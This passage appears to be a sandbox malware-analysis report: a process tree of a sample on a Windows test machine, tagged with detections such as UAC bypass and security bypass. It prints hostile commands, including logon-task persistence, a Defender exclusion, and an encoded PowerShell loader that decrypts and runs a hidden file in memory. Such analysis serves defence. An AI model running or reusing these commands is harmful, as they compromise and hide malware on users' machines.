                                                          • Enumerates system info in registry
                                                          PID:5892
                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                          xcopy spinner.gif C:\Users\Admin\Desktop
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Enumerates system info in registry
                                                          PID:5088
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /K bloatware.cmd
                                                          3⤵
                                                          • Checks computer location settings
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2652
                                                          • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\1.exe
                                                            1.exe
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies registry class
                                                            PID:4140
                                                            • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                              "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:6944
                                                              • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{AE2E0D11-5045-4EA3-9F10-1D8C1D90EE68} {6B4DFF4F-4CCB-4AD9-9207-66913C65622F} 6944
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6956
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c install.bat
                                                              5⤵
                                                                PID:6464
                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                  regsvr32 /s "DroidCamFilter32.ax"
                                                                  6⤵
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies registry class
                                                                  PID:7040
                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                  regsvr32 /s "DroidCamFilter64.ax"
                                                                  6⤵
                                                                  • Loads dropped DLL
                                                                  PID:7020
                                                                  • C:\Windows\system32\regsvr32.exe
                                                                    /s "DroidCamFilter64.ax"
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    • Modifies registry class
                                                                    PID:7008
                                                              • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                • Drops file in Windows directory
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:628
                                                              • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                • Drops file in Windows directory
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2732
                                                            • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\3.exe
                                                              3.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4944
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 768
                                                                5⤵
                                                                • Program crash
                                                                PID:6892
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                              4⤵
                                                              • Blocklisted process makes network request
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6264
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                              4⤵
                                                                PID:6284
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                                  WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6424
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-U11PB.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-U11PB.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$20366,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:6496
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                                      7⤵
                                                                        PID:6600
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /im winaerotweaker.exe /f
                                                                          8⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:6788
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                                        7⤵
                                                                          PID:6636
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im winaerotweakerhelper.exe /f
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:6840
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\regmess.exe
                                                                  regmess.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:3580
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_e0e46065-7097-4dcf-b6cc-32f0e1707c74\regmess.bat" "
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5116
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import Setup.reg /reg:32
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6248
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import Console.reg /reg:32
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6272
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import Desktop.reg /reg:32
                                                                      5⤵
                                                                      • Sets desktop wallpaper using registry
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6332
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg import International.reg /reg:32
                                                                      5⤵
                                                                        PID:6432
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg import Fonts.reg /reg:32
                                                                        5⤵
                                                                        • Modifies Internet Explorer settings
                                                                        PID:6592
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg import Cursors.reg /reg:32
                                                                        5⤵
                                                                          PID:6796
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 10
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Delays execution with timeout.exe
                                                                      PID:5496
                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\scary.exe
                                                                      scary.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:6652
                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                        4⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:6664
                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                        4⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:6856
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                          5⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:6676
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DaqjjI5FbD3l.bat" "
                                                                          5⤵
                                                                            PID:6976
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              6⤵
                                                                                PID:3624
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                6⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:7040
                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                6⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:6200
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                  7⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:6336
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mVEIUmRIUibD.bat" "
                                                                                  7⤵
                                                                                    PID:6232
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      8⤵
                                                                                        PID:5892
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        8⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:5324
                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                        8⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:1624
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                          9⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:6984
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Els5Z5KdFCz7.bat" "
                                                                                          9⤵
                                                                                            PID:5752
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 65001
                                                                                              10⤵
                                                                                                PID:6636
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 10 localhost
                                                                                                10⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:7112
                                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                10⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:7048
                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                  11⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:5928
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4MkTnCzL9UFL.bat" "
                                                                                                  11⤵
                                                                                                    PID:2028
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      12⤵
                                                                                                        PID:6212
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        12⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:7152
                                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                        12⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:4308
                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                          13⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:1336
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Avm6OXrJo17.bat" "
                                                                                                          13⤵
                                                                                                            PID:624
                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                              chcp 65001
                                                                                                              14⤵
                                                                                                                PID:3792
                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                ping -n 10 localhost
                                                                                                                14⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                • Runs ping.exe
                                                                                                                PID:6480
                                                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                14⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:6232
                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                  15⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:6912
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MAfpV6CtjHxK.bat" "
                                                                                                                  15⤵
                                                                                                                    PID:6460
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp 65001
                                                                                                                      16⤵
                                                                                                                        PID:5840
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping -n 10 localhost
                                                                                                                        16⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:6328
                                                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                        16⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:5604
                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                          17⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:6356
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G9ostBCEsZZ6.bat" "
                                                                                                                          17⤵
                                                                                                                            PID:6740
                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                              chcp 65001
                                                                                                                              18⤵
                                                                                                                                PID:6412
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                ping -n 10 localhost
                                                                                                                                18⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:6620
                                                                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                18⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                PID:2720
                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                  19⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:7020
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lMvUPviLNKi5.bat" "
                                                                                                                                  19⤵
                                                                                                                                    PID:6328
                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                      chcp 65001
                                                                                                                                      20⤵
                                                                                                                                        PID:3472
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping -n 10 localhost
                                                                                                                                        20⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:4448
                                                                                                                                      • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                        "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                        20⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:6368
                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                          21⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1504
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0zEsHQ839DEs.bat" "
                                                                                                                                          21⤵
                                                                                                                                            PID:6188
                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                              chcp 65001
                                                                                                                                              22⤵
                                                                                                                                                PID:6596
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping -n 10 localhost
                                                                                                                                                22⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6648
                                                                                                                                              • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                                                "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                                                22⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:6852
                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                                                  23⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:1740
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FVU4iQ2RsIlI.bat" "
                                                                                                                                                  23⤵
                                                                                                                                                    PID:3160
                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                      chcp 65001
                                                                                                                                                      24⤵
                                                                                                                                                        PID:4952
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                        24⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:6560
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\the.exe
                                                                                                              the.exe
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6692
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                                                                4⤵
                                                                                                                • UAC bypass
                                                                                                                • Windows security bypass
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:7124
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\the.exe" -Force
                                                                                                                  5⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
